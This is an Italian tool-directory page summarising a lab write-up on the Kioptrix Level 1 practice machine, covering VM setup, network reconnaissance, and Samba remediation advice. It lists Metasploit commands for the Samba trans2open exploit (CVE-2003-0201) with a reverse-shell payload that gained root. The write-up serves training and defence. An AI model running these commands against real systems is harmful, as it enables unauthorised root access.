Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Kioptrix-Level1-Vulnerability-Analysis — Audit tecnico di Kioptrix Level 1. Focus: sfruttamento di Samba 2.2.1a (CVE-2003-0201), enumerazione manuale e rafforzamento dell'infrastruttura interna. | Kitploit
Strumenti/GitHubGitHub/deepakkcybersec-eng/kioptrix-level1-vulnerability-analysis
Escalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingApprendimento e FormazioneRed TeamingLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubdeepakkcybersec-eng/kioptrix-level1-vulnerability-analysis

Kioptrix-Level1-Vulnerability-Analysis

Audit tecnico di Kioptrix Level 1. Focus: sfruttamento di Samba 2.2.1a (CVE-2003-0201), enumerazione manuale e rafforzamento dell'infrastruttura interna.

Vedi Repository
8 mesi faNon ancora revisionato

Kioptrix Level 1: Audit e Sfruttamento delle Vulnerabilità a Spettro Completo

🏛️ Obiettivo Professionale

L'obiettivo era quello di eseguire un test di penetrazione strutturato sull'ambiente Kioptrix Level 1 per ottenere un compromesso completo come 'root' e documentare strategie di remediation tecniche adatte sia per le operazioni Red Team che Blue Team.

🏗️ Riproduzione dell'Ambiente (Storia Hardware)

I valori predefiniti della virtualizzazione moderna spesso falliscono su kernel legacy del 2010. Per avviare e mettere in rete correttamente questa macchina, sono state richieste le seguenti configurazioni architetturali specifiche:

  • Sottotipo OS: Linux / Red Hat (32-bit).
  • Architettura di Storage: Passaggio da SATA a Controller IDE per supportare il disco rigido legacy .vmdk.
  • Protocollo di Rete: Configurato come PCI FAST-III con un adattatore Host-only per consentire la comunicazione interna con la macchina d'attacco Kali Linux.

⚔️ Analisi Offensiva (Percorso Red Team)

Lo sfruttamento ha seguito un ciclo di vita manuale dall'enumerazione allo sfruttamento:

1. Scoperta e Ricognizione

  • Netdiscover: Utilizzato netdiscover -r 192.168.184.4 per identificare l'IP target.
  • Scan Nmap: Identificati servizi tra cui SSH (22), HTTP (80), RPC (111) e NetBIOS-SSN (139). Samba 2.2.1a è stato segnalato come punto di ingresso primario.

2. Sfruttamento (Samba trans2open)

  • Vulnerabilità: CVE-2003-0201 (Heap Overflow).
  • Mappa MITRE ATT&CK: - Tattica: Privilege Escalation (TA0004)
    • Tecnica: Exploitation for Privilege Escalation (T1068)
  • Protocollo Metasploit:
    • use exploit/linux/samba/trans2open
    • set RHOSTS 192.168.114.5
    • set payload linux/x86/shell/reverse_tcp
  • Risultato: Generata con successo una reverse shell. Il comando whoami ha restituito root.

🛡️ Remediation Difensiva (Percorso Blue Team)

Per proteggere un ambiente aziendale, sono obbligatorie le seguenti strategie di Vulnerability Management (VM):

  • Protocollo di Patching: Aggiornare Samba all'ultima versione supportata (Samba 4.x). La vulnerabilità nella funzione call_trans2open è efficacemente corretta in tutte le versioni moderne.
  • Hardening di Rete: Implementare firewall basati su host per limitare le Porte 139 e 445 solo a subnet interne fidate.
  • Strategia del Ruolo VM: Questa remediation rientra nei cicli standard di Vulnerability Management durante l'orario lavorativo, garantendo la stabilità dell'infrastruttura.

📝 Prove Tecniche e Log Manuali

Le seguenti immagini documentano l'enumerazione manuale in tempo reale e l'esecuzione nel terminale:

Scoperta del Target e Note sull'Architettura

Note manuali 1

Logica dei Comandi Metasploit e Configurazione del Payload

Note manuali 2

Prova di Accesso Root (Screenshot del Terminale)

Prova di shell root

Scarica lo strumento